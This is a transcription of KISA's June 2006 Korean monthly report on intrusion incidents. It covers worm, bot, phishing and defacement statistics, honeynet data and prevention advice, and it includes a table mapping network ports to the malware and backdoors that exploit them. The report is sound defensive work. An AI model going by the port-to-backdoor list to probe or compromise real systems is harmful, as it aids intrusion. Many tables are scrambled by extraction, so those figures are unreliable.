< F36BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BE292E687770>
|
|
- 호근 도
- 6 years ago
- Views:
Transcription
1
2 2006 년 6 월 인터넷침해사고동향및분석월보 한국정보보호진흥원 해킹 바이러스상담전화 ( 국번없이 ) 본보고서내용의전부나일부를인용하는경우에는반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 을명시하여주시기바랍니다. 컬러로출력하거나화면으로보시면도표를구분하기쉽습니다.
3 목차 <Part I> 주요통계 1. 총평 1 2. 요약 1 3. 주요지표현황 2 1. 웜 바이러스 3 전체추이 3 웜 바이러스종류별신고현황 4 신종및변종웜 바이러스 5 주요웜 바이러스별신고현황 6 2. 해킹 7 전체추이 7 피해운영체제별분류 8 피해기관별분류 9 피싱경유지신고처리현황 10 홈페이지변조사고처리현황 11
4 <Part II> 허니넷분석 1. 웜 바이러스의종류별수집현황 주요웜 바이러스별수집현황 악성봇 (Bot) 현황 웜 바이러스취약 PC의생존가능시간 (Survival time) 및감염유형 허니넷공격정보수집현황 국내로부터의포트스캔현황 국외로부터의포트스캔현황 국가별포트스캔현황 25 <Part III> 주요보안공지 / 월간특집 1. 인터넷침해사고대응지원센터경보현황 인터넷침해사고대응지원센터보안공지사항 28 6월피싱경유지신고통계분석 년도상반기마이크로소프트社제품관련보안취약점현황보고서 35 악성 Bot 감염 PC 사례분석 46 아파치웹서버에서악성코드유포사례 52 참고자료 : 악성코드유포지 / 경유지사이트조기탐지및차단조치 60 용어정리 63
5 PART I 주요통계
6 1. 총평 침해사고현황 - 웜 바이러스신고접수는 Bagle 변종웜의출현 (KrCERT 보안공지, 6.21) 으로전월에비하여 74.5% 증가 06 년상반기웜 바이러스신고접수는전년도상반기에비하여 63.5% 감소 - 해킹신고처리는전월대비 11.9% 증가 ( 스팸릴레이, 기타해킹은각각 22.0%, 25.2% 증가, 피싱경유지, 단순침입시도, 홈페이지변조는각각 12.3%, 20.4%, 23.4% 감소 ) 06 년상반기해킹신고처리는전년도상반기에비하여 42.1% 감소 - 전세계 Bot 감염추정 PC 대비국내감염추정비율은 11.4% 로전월대비 2.3%p 증가 06 년상반기악성 Bot 감염비율은월평균 11.2% 로전년도상반기평균 (23.3%) 대비 12.1%p 낮아짐 ( 국내주요 ISP 와 DNS 싱크홀적용을통한좀비시스템의악성 Bot 명령 / 제어서버로의접속차단효과로인해감염비율이 06 년상반기에월별로증감은있었으나전년도에비해전반적으로낮아진것으로보임 ) 주요보안공지 - MS Excel 의신규취약점으로인한피해주의 (6/23). 보안패치가발표되지않은 MS Excel 의취약점을공격할수있는공격코드발견되어사용자의주의를요함. 예방및대책 : 출처가불분명한이메일과메신저등으로전송되는 Excel 파일에대한열람주의. 사용하고있는백신프로그램을최신버전으로업데이트하고, 실시간감시기능을활성화시킴 참조사이트 : 보안정보 보안공지 MS Excel 의신규취약점으로인한피해주의 - Win32/Bagle.worm 확산에따른감염주의 (6/21). 이메일첨부파일 ( 암호화된압축파일과암호키값에대한이미지파일 ) 을통하여전파되며, 특정사이트에접속하여추가로악성코드를다운로드받는특징을가지는 Bagle 변종웜에대한주의필요. 예방및대책 : 출처가불분명한이메일및첨부파일에대한열람주의 참조사이트 : 보안정보 보안공지 Win32/Bagle.worm 확산에따른감염주의 - PC 생존가능시간을측정한결과, 평균적으로 Windows XP(SP1) 는 25 분56 초, Windows 2000(SP4) 은 25분 55초로전월에비하여 Windows XP는 3분23초증가, Windows 2000은 4분21초감소 2. 요약 구분 핵심요약 웜 바이러스 총 745건 : 전월 ( 427건 ) 대비 74.5% 증가, 전년동월 (1,578건) 대비 52.8% 감소 해킹신고처리 총 2,433건 : 전월 (2,175건) 대비 11.9% 증가, 전년동월 (2,217건) 대비 9.7% 증가 스팸릴레이 - 총1,418건 : 전월 (1,162건) 대비 22.0% 증가, 전년동월 ( 830건 ) 대비 70.8% 증가 피싱경유지 - 총 114건 : 전월 ( 130건 ) 대비 12.3% 감소, 전년동월 ( 116건 ) 대비 1.7% 증가 단순침입시도 - 총 227건 : 전월 ( 285건 ) 대비 20.4% 감소 기타해킹 - 총 556건 : 전월 ( 444건 ) 대비 25.2% 증가 06.1월부터기존 일반해킹 을 단순침입시도 와 기타해킹 로세분함 ( 전년동월일반해킹 470건 ) 홈페이지변조 - 총 118건 : 전월 ( 154건 ) 대비 23.4% 감소, 전년동월 (801건) 대비 85.3% 감소 봇 (Bot) 전세계 Bot 감염 PC 대비국내 Bot 감염 PC 비율 11.4% 로전월대비 2.3%p 증가 - 1 -
7 3. 주요지표현황 [ 표 1] 침해사고주요지표현황 구분 2005년 2006년 2006년총계 총계 웜 바이러스 16, ,588 해킹신고처리 33,633 2,225 1,968 2,032 1,799 2,175 2,433 12,632 - 스팸릴레이 6, ,162 1,418 5,789 - 피싱경유지 1, 단순침입시도 ,481 - 기타해킹 9, ,261 - 홈페이지변조 16, ,416 봇 (Bot) 18.8% 10.0% 11.8% 14.6% 10.1% 9.1% 11.4% 11.2% 봇 (Bot) 통계는전세계 Bot 감염추정 PC 중국내 PC 가차지하는비율임 06 년 1 월부터기존 일반해킹 을 단순침입시도 와 기타해킹 으로세분함 - 단순침입시도 : KISA 에서접수 처리한해킹신고중웜 바이러스등악성코드로인하여유발된스캔 ( 침입시도 ) 을피해자 ( 기관 ) 가신고한사고임 - 기타해킹 : KISA 에서접수 처리한해킹신고중스팸릴레이, 피싱경유지, 단순침입시도를제외한나머지사고임 2,500 2,000 1,500 1, ,000 1,500 1, 년 2005 년 < 웜 바이러스신고접수건수 > 년 2005 년 < 단순침입시도 + 기타해킹신고처리 > 2,000 1,500 1, ,000 6,000 4,000 2, ,162 1, 년 2005 년 < 스팸릴레이신고처리건수 > 년 2005 년 < 홈페이지변조사고처리건수 > % 20% 10% 0% 년 2005 년 < 피싱경유지신고처리건수 > 14.6% 11.8% 10.0% 11.4% 10.1%9.1% 2006 년 2005 년 < 악성 Bot 감염비율 > 봇 (Bot) 주요용어 : 운영체제취약점, 비밀번호의취약성, 웜 바이러스의백도어등을이용하여전파되며, 해킹명령전달사이트와의백도어연결등을통하여스팸메일전송이나 DDoS 공격에악용이가능한프로그램또는실행코드 스팸릴레이 (Spam Relay) : 스팸메일발신자추적을어렵게하기위하여타시스템을스팸메일발송에악용 웜 (Worm) 침해사고 : 독립적으로자기복제를실행하여번식하는빠른전파력을가진프로그램또는실행가능한코드 : 해킹, 컴퓨터바이러스, 논리 메일폭탄, 서비스거부또는고출력전자기파등을사용하여컴퓨터시스템이나인터넷망을공격하는행위로인하여발생하는사고로본보고서에서는웜 바이러스, 해킹, 애드웨어 / 스파이웨어로분류함 트로이잔 (Trojan) : 자기복제능력은없으나정상기능의프로그램으로가장하여프로그램내에숨어있는코드조각으로의도하지않은기능을수행하는프로그램또는실행코드 피싱 (Phishing) 경유지 : 국외의침해사고대응기관이나위장사이트의대상이된기관또는업체, 일반사용자로부터신고받아처리한건수로써실제피싱으로인한피해사고건수가아니라보안이취약한국내시스템이피싱사이트경유지로악용되어신고된건수임 - 2 -
8 1. 웜 바이러스 전체추이 [ 표 2] 월별국내웜 바이러스신고건수 구분 2005 년총계 2006 년 년총계 신고건수 16, ,588 웜 바이러스신고건수는 KISA, 안철수연구소, 하우리가공동으로집계한결과임 2,500 2, 년 2006 년 1,500 1, 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 ( 그림 1) 월별국내웜 바이러스신고건수 6월중국내백신업체와 KISA에신고된웜 바이러스신고건수는 745건으로전월의 427건에비하여 74.5% 증가하였으며, 전년동월 (1,578건) 에비해서는 52.8% 감소하였다. 전월에비하여증가한이유는 KrCERT 홈페이지를통하여보안공지 (6.21) 한바있는암호화된압축파일및암호키값에대한이미지파일을이메일로첨부하여전파되는 Bagle변종웜이출현하였기때문이며, 전년동월에비하여감소한이유는 05년 6월에전체신고건수의 49.4% 를차지하였던 Netsky, Mytob 변종웜에의한피해신고가 06 년들어감소하였기때문인것으로파악되었다. 06 년상반기동안웜 바이러스신고건수는전년도상반기에비하여 63.5% - 3 -
9 감소 (9,832건 3,588건 ) 하였으며, 월별증감추세는 4월에감소하고 5월에증가하여전년도와유사한특징을보인것으로분석되었다. 웜 바이러스종류별신고현황 [ 표 3] 월별웜 바이러스종류별구분 구분 2005년 2006년 2006년총계 총계 웜 10, ,389 트로이잔 바이러스 기타 3, 합계 16, ,588 기타는분류가명확하지않은웜 바이러스신고임 웜 (Worm) : 독립적으로자기복제를실행하여번식하는빠른전파력을가진컴퓨터프로그램또는실행가능한코드 트로이잔 (Trojan) : 자기복제능력은없으나정상기능의프로그램으로가장하여프로그램내에숨어있는코드조각으로의도하지않은기능을수행하는컴퓨터프로그램또는실행가능한코드 바이러스 (Virus) : 컴퓨터프로그램이나메모리에자신또는자신의변형을복사해넣는악의적인명령어들로조합하여불특정다수에게피해를주기위한목적으로제작된모든컴퓨터프로그램또는실행가능한코드 2,000 1,500 '05 웜 '05 트로이잔 '05 바이러스 '05 기타 '06 웜 '06 트로이잔 '06 바이러스 '06 기타 1, 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월 ( 그림 2) 월별웜 바이러스종류별구분 6월에신고된웜 바이러스등악성코드를종류별로분류한결과전월과마찬가지로웜, 트로이잔, 바이러스순이었으며, 웜의신고건수는 545건으로전월과대비 103.4% 증가 (268건 545건 ) 하였으며, 트로이잔은 84건으로전월대비 19.2% 감소 (104건 84건 ) 하였다. 이번달에웜의신고건수가증가한이유는암호화된압축파일을통하여전파 - 4 -
10 되는 Bagle 변종웜이출현하였기때문이다. 최근웜 바이러스동향가운데주목할만한점은트로이잔이차지하는비율이여전히전년도상반기에비해서는전반적으로높으나금년 3월이후다소감소하고있는추세를보인다는점이다. 한국정보보호진흥원에서국내소재 7만 4천개웹사이트를대상으로악성코드 ( 주로게임 ID/ 비밀번호유출트로이잔 ) 은닉여부를점검, 조기탐지하여삭제 / 차단조치하고있으나웹사이트관리자및사용자의지속적인관심과주의가필요하다고하겠다. 06년상반기동안웜 바이러스종류별경향을분석한결과게임아이디 / 비밀번호등을유출하는트로이잔종류가차지하는비율은전년도상반기에비하여 3배이상증가 (158건 736건 ) 하였으며웜이차지하는비율은약 2배정도감소 (7,076건 2,389건 ) 하였다. 신종및변종웜 바이러스 [ 표 4] 월별신종웜 바이러스 구분 2005년 년총계 총계 A사 B사 합계 [ 표 5] 월별변종웜 바이러스 구분 2005년 년총계 총계 A 사 B사 합계 ,016 신종및변종웜 바이러스는 안철수연구소와 하우리의자료를이용하여집계하였음 6월의주요신종웜 바이러스로는특정웹메일시스템의취약점을이용하여해당웹메일서버사용자계정으로악성자바스크립트가포함된웹메일을전송하는 JS/Yamann 웜이있었으며, 주요변종으로는 Win32/Brontok.worm로메일주소를수집하여웜이첨부된메일을발신하고, 특정도메인을가진웹사이트에대한서비스거부 (Denial of Service) 공격하는웜등이있었다. 변종웜 바이러스는전월대비 34.0% 감소 (209 개 138 개 ) 하였다
11 주요웜 바이러스별신고현황 [ 표 6] 주요웜 바이러스신고현황 2006년 순위 1월 2월 3월 4월 5월 6월 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 1 NETSKY 173 BAGLE 365 NETSKY 160 NETSKY 107 NETSKY 166 BAGLE IRCBOT 63 NETSKY 145 BAGLE 50 DOWNLOADER 61 BAGLE 49 NETSKY PARITE 41 IRCBOT 53 XEMA 49 BAGLE 30 VUNDO 23 DETNAT 67 4 LINEAGEHACK 37 MYTOB 25 DOWNLOADER 48 LINEAGEHACK 23 LINEAGEHACK 17 LINEAGEHACK 22 5 MYTOB 29 PARITE 20 IRCBOT 39 IRCBOT 20 DOWNLOADER 16 IRCBOT 13 6 MASLAN 26 DOWNLOADER 20 MYTOB 22 MYTOB 19 IRCBOT 12 DOWNLOADER 9 7 LOVGATE 25 MASLAN 17 LINEAGEHACK 21 XEMA 9 ZASRAN 11 MYDOOM 7 8 SASSER 24 SASSER 16 HANGHACK 17 SASSER 7 KORGAMEHACK 7 ROOTKIT 7 9 HANGHACK 21 LINEAGEHACK 15 TENGA 12 AGENT 6 TENGA 6 AGENT 6 10 SOBER 12 HANGHACK 13 KORGAMEHACK 10 TENGA 6 BRONTOK 6 XEMA 5 11 XEMA 11 LOVGATE 11 PARITE 8 DLLBOT 5 AGENT 5 ZASRAN 5 12 VALLA 9 AGOBOT 9 SASSER 8 BAGLESPAMTOOL 5 MYTOB 5 LOVGATE 5 13 AGENT 8 PARADROP 8 AGENT 5 MHTREDIR 5 PARITE 5 BLEAH 5 14 DOWNLOADER 8 BOBAX 7 HACDEF 5 BRONTOK 4 MASLAN 5 BANKER 4 15 MHTREDIR 8 TENGA 7 HUPIGON 5 LAGER 3 XEMA 4 VIRTUMOD 4 기타 111 기타 128 기타 97 기타 85 기타 90 기타 83 합계 606 합계 859 합계 556 합계 395 합계 427 합계 745 6월전체웜 바이러스신고는 745건으로전월에비하여 74.5% 증가하였다. 이번달에는출현한 Bagle 변종웜에의한피해신고가 1위를차지하였으며전체신고건수도 45.1% 를차지하였다. 전월 1위를차지하였던 Netsky 웜은이번달에도전월 (166건 ) 과비슷한신고건수 (167건 ) 를기록하였다
12 2. 해킹 전체추이 [ 표 7] 해킹신고처리현황 구분 2005년 2006년 2006년총계 총계 스팸릴레이 6, ,162 1,418 5,789 피싱경유지 1, 단순침입시도 ,481 기타해킹 9, ,261 홈페이지변조 16, ,416 합계 33,633 2,225 1,968 2,032 1,799 2,175 2,433 12,632 상기자료는국내 외로부터 로 KISA에접수된해킹신고를기반으로작성하였음 ( 홈페이지변조는예외 ) 06년 1월부터기존 일반해킹 을 단순침입시도 와 기타해킹 으로세분함 스팸릴레이 (Spam Relay) : 스팸메일발신자추적을어렵게하기위하여타시스템을스팸메일발송에악용 피싱 (Phishing) : 정상적인웹서버를해킹하여위장사이트를개설한후, 인터넷이용자들의금융정보등을빼내는신종사기수법으로 Bank Fraud, Scam이라고도함 피싱 (Phishing) 경유지신고건수는 KISA 가국외의침해사고대응기관이나위장사이트의대상이된기관또는업체, 일반사용자로부터신고받아처리한건수로써실제피싱으로인한피해사고건수가아니라보안이취약한국내시스템이피싱사이트경유지로악용되어신고된건수임 '05 기타해킹 '05 스팸릴레이 '05 피싱경유지 '05 홈페이지변조 '06 단순침입시도 '06 스팸릴레이 '06 피싱경유지 '06 홈페이지변조 '06 기타해킹 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월 ( 그림 3) 해킹신고처리현황 6월 KISA에서처리한해킹신고는 2,433건으로전월 (2,175건 ) 대비 11.9% 증가하였다. - 스팸릴레이, 기타해킹은각각 22.0%, 25.2% 증가하였으며피싱경유지, 단순침입시도, 홈페이지변조는각각 12.3%, 20.4%, 23.4% 감소하였다. 06년상반기동안전체해킹신고처리건수는전년도상반기에비하여 42.1% 감소 (21,816건 12,632건 ) 하였는데그이유는특히, 지난해상반기에비하여홈페이지변조건수가감소하였기때문이다
13 피해운영체제별분류 [ 표 8] 피해운영체제별분류 운영체제 2005년 2006년 2006년총계 총계 Windows 7,470 1,485 1,376 1,423 1,378 1,836 2,028 9,526 Linux 14, ,685 Solaris 기타 합계 23,019 2,225 1,968 2,032 1,799 2,175 2,433 12,632 운영체제별분류자료는각운영체제의안전성과는상관관계가없으며, 단지신고에따른분석자료임 7,000 6,000 5,000 '05 Windows '05 Linux '05 Solaris '05 기타 '06 Windows '06 Linux '06 Solaris '06 기타 4,000 3,000 2,000 1, ,423 1,378 1,836 2,028 1, 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월 ( 그림 4) 피해운영체제별분류 6월해킹신고처리결과를운영체제별로분류한결과전월과마찬가지로 Windows, Linux, Solaris 운영체제순이었다. 전체적인추이에있어서도전월과크게다르지않았으며, Windows 운영체제가차지하는비율도 83.4% 로전월 (84.4%) 과비슷하였다
14 피해기관별분류 [ 표 9] 피해기관별분류 기관 2005 년총계 년총계 기업 11, ,276 대학 비영리 1, 연구소 네트워크 1, 기타 ( 개인 ) 7,283 1,284 1,245 1,402 1,350 1,809 2,023 9,113 총계 23,019 2,225 1,968 2,032 1,799 2,175 2,433 12,632 기관분류기준 : 기업 (co, com), 대학 (ac), 비영리 (or, org), 연구소 (re), 네트워크 (ne, net), 기타 (pe 또는 ISP 에서제공하는유동 IP 사용자 ) 5,000 4,000 '05 기업 '05 대학 '05 비영리 '05 네트워크 '05 기타 ( 개인 ) '06 기업 '06 대학 '06 비영리 '06 네트워크 '06 기타 ( 개인 ) 3,000 2,023 2,000 1,809 1, , 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 ( 그림 5) 피해기관별분류 피해기관별로분류한결과, 기타 ( 개인 ), 기업, 대학, 비영리의순으로나타났다. 침해사고관련 IP가주로 ISP에서제공하는유동 IP( 주로개인용컴퓨터 ) 인경우에해당되는기타 ( 개인 ) 의비율은전월에비하여 11.8% 증가 (1,809 2,023건) 하였다
15 피싱경유지신고처리현황 [ 표 10] 피싱경유지신고건수 구분 피싱경유지신고건수 2005 년총계 2006 년 , 년총계 피싱 (Phishing) : 정상적인웹서버를해킹하여위장사이트를개설한후, 인터넷이용자들의금융정보등을빼내는신종사기수법으로 Bank Fraud, Scam 이라고도함 피싱 (Phishing) 경유지신고건수는 KISA 가국외의침해사고대응기관이나위장사이트의대상이된기관또는업체, 일반사용자로부터신고받아처리한건수로써실제피싱으로인한피해사고건수가아니라보안이취약한국내시스템이피싱사이트경유지로악용되어신고된건수임 년 2006 년 0 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 ( 그림 6) 피싱경유지신고건수 6월피싱경유지신고건수는총 114건으로, 전월 (130건) 에비하여 16건 (12.3%) 이감소한것으로나타났다. 피싱경유지사이트를기관별로분류해본결과, 기업 50건 (43.9%), 기타 / 개인 11건 (9.6%), 교육 7건 (6.1%), 비영리 7건 (6.1%) 등의순이었으며, 해당홈페이지내에기관정보가없거나 whois 등록정보에 ISP 관리대역으로만조회되어실제사용기관을확인할수없는경우인 ISP 서비스이용자 유형이 39건 (34.2%) 을차지하였다. 6월피싱경유지신고통계분석부분참조 06년상반기동안피싱경유지신고의월평균건수는 114건으로, 05년상반기월평균건수 (78건) 에비하여 36건이증가한것으로나타났다
16 홈페이지변조사고처리현황 [ 표 11] 홈페이지변조사고처리현황 구분 2005년 2006년 2006년총계 총계 피해홈페이지수 16, ,416 피해시스템수 2, 피해시스템수는피해 IP 수를기준으로산정한것으로단일 IP 에수십 ~ 수백개의홈페이지를운영하는경우도있으므로피해홈페이지수는피해시스템수보다많을수있음 8,000 6,000 '05 피해홈페이지수 '05 피해시스템수 (IP) '06 피해홈페이지수 '06 피해시스템수 (IP) 4,000 2, 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월 ( 그림 7) 홈페이지변조사고처리현황 6 월에는 82 개시스템 (IP) 의 118 개사이트 ( 도메인 ) 에대한홈페이지변조가발생하여피해사이트수가전월에비하여 23.4% 감소 (154 개 118 개 ) 하였다. - 홈페이지변조피해사이트수는 1월이후지속감소하고있으나, 취약한웹사이트는피싱경유지, 악성코드유포지 / 경유지로악용될수있으므로웹사이트운영자들의지속적인주의가필요하다. 참고사이트 ModSecurity 를이용한아파치웹서버보안 : 보안정보 기술문서 ModSecurity 를이용한아파치웹서버보안 WebKnight 를이용한 SQL Injection 공격차단 : 보안정보 기술문서 WebKnight 를이용한 SQL Injection 공격차단 홈페이지개발보안가이드 : 초기화면 왼쪽 홈페이지개발보안가이드 06년상반기동안홈페이지변조사고처리건수는전년도상반기에비하여 80.7% 감소 (12,519건 2,416건) 한것으로나타났다
17 PART Ⅱ 허니넷분석
18 1. 웜 바이러스의종류별수집현황 KISA 및 2개기관 / 업체의바이러스월을통하여수집된웜 바이러스탐지건수를종류별로구분한결과는다음과같다. [ 표 12] 수집된웜 바이러스의종류별현황 구분 웜 ,083 (13.3%) 트로이잔 503,269 (54.1%) 바이러스 기타 합계 80,172 (8.6%) 223,067 (24%) 930,591 (100%) 81,390 (13.4%) 311,846 (51.2%) 56,646 (9.3%) 158,619 (26.1%) 608,501 (100%) 78,766 (15.6%) 231,338 (45.7%) 51,149 (10.1%) 144,496 (28.6%) 505,749 (100%) 66,801 (12.4%) 249,488 (46.4%) 55,254 (10.3%) 165,603 (30.8%) 537,146 (100%) 53,610 (9.6%) 240,532 (43.2%) 52,605 (9.5%) 209,886 (37.7%) 556,633 (100%) 40,049 (8.1%) 233,555 (47.2%) 46,379 (9.4%) 175,063 (35.4%) 495,046 (100%) 2006 년 2006 년합계 ( 평균 ) 444,699 (12.2%) 1,770,028 (48.7%) 342,205 (9.4%) 1,076,734 (29.6%) 3,633,666 (100%) 바이러스월을통한웜 바이러스종류별수집건수는관련업체 (( 주 ) 뉴테크웨이브 ) 의탐지건수를반영하였음 웜, 12.2% 기타, 29.6% 바이러스, 9.4% 트로이잔, 48.7% ( 그림 8) 수집된웜 바이러스의종류별현황 바이러스월을통하여수집된웜 바이러스의종류별비율은트로이잔 47.2% 로전월 (43.3%) 에비하여 3.9% 증가하였으며, 웜은 8.1% 로전월 (9.6%) 에비하여 1.5% 감소하였으며바이러스는 9.4% 로전월 (9.5%) 와비슷한수준이었다. - 바이러스월을통한자동탐지건수가운데이번달에출현한 Bagle 변종웜의순위 (15위미만 ) 는피해신고건수 (3쪽) 에비하여 (1위) 상대적으로낮았는데, 그이유는해당웜이암호화된압축파일을첨부하는등일반인이인지하고신고하기쉬운특징을가졌기때문에피해신고건수가다소많았던것이기때문으로보인다
19 2. 주요웜 바이러스별수집현황 KISA 및 2개기관 / 업체의바이러스월등을통하여수집된웜 바이러스의주요순위는다음과같다. - 전체수집건수가운데가장많은탐지건수를보였던웜 바이러스는전월과마찬가지로 DOWNLOADER와 EZRUL 이었다. EZURL 은인터넷익스플로러의주소입력창의키워드를가로채특정서버에전송하는악성코드이며 DOWNLOADER의경우백신업체에따라명칭은다르지만대부분웹사이트를통해감염되는트로이잔종류로감염시추가적으로악성코드를다운로드받는특징이있다. 백신및보안패치관련참고 : 초기화면 상단의 사이버방역 [ 표 13] 수집된주요웜 바이러스현황 2006 년 순위 1월 2월 3월 4월 5월 6 월 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 1 DOWNLOADER 125,216 DOWNLOADER 86,129 DOWNLOADER 78,267 DOWNLOADER 53,171 EZURL 63,373 DOWNLOADER 53,666 2 MHTREDIR 99,389 CLICK 53,193 MYBOT 40,991 MYBOT 41,023 DOWNLOADER 52,374 EZURL 39,358 3 MYBOT 65,860 MYBOT 40,593 PARITE 35,403 PARITE 37,751 PARITE 34,498 PARITE 31,176 4 STARTPAGE 42,152 PARITE 34,584 STARTPAGE 24,713 POPUPER 35,149 MYBOT 33,848 NTROOTKIT 22,633 5 PWS 42,068 AGOBOT 28,220 AGOBOT 20,861 STARTPAGE 21,241 PWS 20,954 MYBOT 22,426 6 PARITE 41,600 STARTPAGE 23,630 QUICKBAR 19,193 EZURL 19,251 STARTPAGE 17,984 PROXY 20,640 7 QUICKBAR 35,588 PWS 22,057 PWS 18,032 MULDROP 18,459 POPUPER 16,418 OLLARREVENU 17,208 8 AGOBOT 33,490 QUICKBAR 15,809 MULDROP 15,422 LINEAGE 14,300 PROXY 14,566 LINEAGE 13,712 9 LINEAGE 26,373 HLLM 15,310 HLLM 13,685 HLLM 12,490 LINEAGE 11,771 STARTPAGE 13, PROXY 20,176 MHTREDIR 13,565 GAMECRACK 11,004 AGOBOT 12,118 HLLM 11,367 HLLM 10, INCA 15,484 NOV A 11,882 HLLW 9,729 HLLW 11,497 MULDROP 10,563 CODEBASE 10, GAMECRACK 14,252 MULDROP 10,241 POPUPER 9,569 CLICK 10,732 CLICK 9,460 POPUPER 8, NTROOTKIT 13,943 LINEAGE 9,883 PROXY 8,988 GAMECRACK 10,250 OLLARREV ENU 8,522 IRC 8, SEEKER 13,870 INCA 9,468 LINEAGE 8,037 NTROOTKIT 9,998 NTROOTKIT 8,379 MULDROP 8, MULDROP 13,792 AHN 8,706 INCA 7,118 PWS 9,496 AGOBOT 7,889 CLICK 7,614 기타 327,338 기타 225,231 기타 184,737 기타 220,220 기타 234,667 기타 206,314 합계 930, , , , , ,
20 3. 악성봇 (Bot) 현황 [ 표 14] 국내악성봇 (Bot) 감염률 2005년 2006 년 2006년구분평균 평균국내비율 18.8% 10.0% 11.8% 14.6% 10.1% 9.1% 11.4% 11.2% 전세계 Bot 감염추정 PC 중국내 Bot 감염 PC 가차지하는비율임 봇 (Bot) : 운영체제취약점, 비밀번호취약성, 웜 바이러스의백도어등을이용하여전파되며, 명령전달사이트와의백도어연결등을통하여스팸메일전송이나 DDoS 공격에악용가능한프로그램또는실행가능한코드 25% 20% 15% 26.4% 25.8% 24.1% 24.6% 20.7% 18.1% 19.4%19.7% 14.6% 2005 년 2006 년 14.6% 13.6% 10% 11.8% 10.0% 10.1% 9.1% 11.4% 9.5% 9.2% 5% 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 ( 그림 9) 국내악성봇 (Bot) 감염률 100,000 전체 IP 수 국내 IP 수 75,000 50,000 25, 일 4 일 7 일 10 일 13 일 16 일 19 일 22 일 25 일 28 일 ( 그림 10) 전세계감염 IP 수와국내감염 IP 수의비교
21 전세계 Bot 감염추정 PC 중에서국내감염 PC 비율은 11.4% 로지난달대비 2.3% 증가하였다. 이는악성 Bot 감염시스템 (IP) 에서 TCP/139, 80 포트트래픽등을대량으로발생하여증가된것으로파악되었다. 자세한내용은악성 Bot 감염 PC 사례분석 (46쪽) 참조 KISA에서는 6월현재까지파악된악성 Bot 명령 / 제어서버로이용되는 110여개의도메인네임을추가, 총 6,350여개도메인네임에대한 DNS 싱크홀을적용하였다. 6월현재까지총 8개사업자가전체 DNS 싱크홀적용, 1개사업자가일부 DNS 싱크홀적용 DNS 싱크홀 : Bot-NET 관리서버의도메인명에실제 IP 주소가아닌특정 IP를부여함으로써 Zombie PC가실제 Bot-Net 관리서버에연결되는것을차단함 Bot의전파에사용되는주요포트는 NetBIOS 관련포트인 445, 139, 135와웹관련 80 포트, MS-SQL 관련포트인 1433 등으로지난달 Top5를차지한포트들이그대로주요포트로사용되고있다.( 그림 11) 전월악성 Bot 사용 Top 5 포트 : 445, 139, 80, 135, % 45% 40% % 30% 25% 20% 15% 10% 5% 0% 1 일 4 일 7 일 10 일 13 일 16 일 19 일 22 일 25 일 28 일 ( 그림 11) Bot 의전파에이용되는전체 Top 5 포트일별추이 국내 Bot 감염추정 PC가 Bot 전파에사용하는주요포트는 139, 135, 80, 1433, 445 포트순으로지난달과동일하다. ( 그림 12) 06년상반기동안악성 Bot 감염비율은평균 11.2% 로전년도상반기평균인 23.3% 보다 12.1%p 낮아진것으로나타났다. 이는국내주요 ISP의적극적인협조로 DNS 싱크홀적용을통한악성 Bot 명령 / 제어서버로의접속차단효과가나타난것으로분석하고있다
22 60% % % 30% 20% 10% 0% 1 일 4 일 7 일 10 일 13 일 16 일 19 일 22 일 25 일 28 일 ( 그림 12) Bot 의전파에이용되는국내 Top 5 포트일별추이 악성 Bot 의전파에이용되는주요포트목록 포트 관련취약점및웜 / 악성 Bot 포트 관련취약점및웜 / 악성 Bot 80 WebDAV (MS03-007) 취약점, Agobot, Polybot 등 2556 Bagle, Bagle2 135 RPC DCOM 취약점 (MS03-026, MS03-039), Polybot, Spybot 등 2745 Bagle, Bagle2 139 NetBIOS Brute force login attempts 3127 MyDoom.A 445 LSASS(MS03-026, 039, 049 등 ) 취약점, Agobot, Polybot, Spybot, Zotob, IRCBot, SDBot 등 3140 Optix Backdoor, Mockbot 등 901 NetDevil 취약점이용 Bot 3176 MyDoom.AB 등 903 NetDevil2 취약점이용 Bot 5000 UPNP (MS01-059) 1023 Sasser Backdoor 취약점이용 Bot 5554 Sasser ftpd Backdoor 1025 DCOM (MS03-026) 취약점이용 Bot 6129 Dameware, Mockbot 등 1080 MyDoom.F 취약점이용 Bot 9898 Dabber Backdoor 1234 SubSeven 취약점이용 Bot SubSeven 1433 MS-SQL Login Brute force 취약점이용 Bot Kuang2-17 -
23 악성 Bot 이란? 악성 Bot 의주요특징 운영체제취약점, 비밀번호의취약성, 웜 바이러스의 Backdoor 이용등을통한전파 일반적으로 IRC 접속을위하여사용되는포트대신임의의포트를사용하므로탐지가어렵고, 암호화기능추가로인하여관련트래픽모니터링어려움 보안프로그램및백신프로그램강제종료와백신업데이트차단으로탐지가어려움 백신제조업체가악성 Bot 의탐지및치료백신패턴의개발을어렵게하기위해, 역어셈블리를어렵게하는기능추가 기존 IRC 와 P2P 를통한제어에 WASTE 를이용함으로써, Botnet 에대한탐지를어렵게함 악성 Bot 감염주요증상 감염된컴퓨터의개인정보수집및유출 감염된컴퓨터를통하여불법프로그램유포, 불법 Proxy 서버, 스팸전달, 특정사이트거부공격등에활용 감염된컴퓨터가위치한네트워크에트래픽유발을통하여네트워크과부하혹은다운현상발생 보안이취약한네트워크장비를이용하여악성 Bot 파일전파및업데이트저장소로이용 감염시스템이느려지거나 CPU 100% 사용 악성 Bot 주요피해 ( 악용 ) 특정 Site 서비스거부공격 제2 의해킹경유지로의사용 Phishing 사이트 불법프로그램및스팸 (SPAM) 유포사이트로사용 악성 Bot 예방및대책 시스템운영체제의패치및보안관리철저 불필요한공유폴더삭제, 추측하기어려운비밀번호사용, 최신백신프로그램업데이트 개인, 기업, ISP 및유관기관등은아래언급된방지책및대비책을숙지하고피해최소화를위하여지속적인점검실시
